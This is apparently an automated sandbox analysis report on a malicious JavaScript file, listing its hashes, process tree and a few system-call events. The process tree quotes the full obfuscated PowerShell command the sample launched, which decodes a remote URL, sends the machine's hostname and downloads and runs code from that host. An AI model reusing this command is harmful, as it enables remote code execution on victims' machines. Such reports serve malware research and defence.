Favorites
Tools
Dr.Zero Chatbot
Notifications
Guide 2020-06-10
Version history 2020-06-10

Summary | ZeroBOX

BLNR1389.js

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 26, 2023, 8:12 p.m.	May 26, 2023, 8:14 p.m.

Size	560.5KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR, LF line terminators
MD5	`d66279c46cb9a2e4d466c045d6f89bce`
SHA256	`8fcccb6e6d160b8573c1d8cdce231562cb6c2dc25f22eff2a44043166541ce32`
CRC32	`3F828904`
ssdeep	`3072:ITKuZYU0V4Nom2QFrRP7AkUisHAUy9+2fhQWmrj/qyGd7Q9uS9mL2K+S8LzzLlnb:BP`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\BLNR1389.js
3004
conhost.exe conhost --headless powershell @(6242,6254,6254,6250,6196,6185,6185,6253,6238,6240,6249,6253,6184,6240,6255,6248,6185,6252,6254,6184,6250,6242,6250,6201,6243,6199)|foreach{$vjpcyh=$vjpcyh+[char]($_-6138)};$jhgomz='l';$tgz=$(hostname);new-alias trys cur$jhgomz;.$([char](7892-7787)+'ex')(trys -useb "$vjpcyh$tgz")
2188

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW May 26, 2023, 8:12 p.m.	computer_name: TEST22-PC	1	1	0

Uses WMI to create a new process (1 event)

Time & API	Arguments	Status	Return	Repeated
IWbemServices_ExecMethod May 26, 2023, 8:12 p.m.	inargs.CurrentDirectory: None inargs.CommandLine: time inargs.ProcessStartupInformation: None outargs.ProcessId: None outargs.ReturnValue: 9 flags: 0 method: Create class: Win32_Process	1	0	0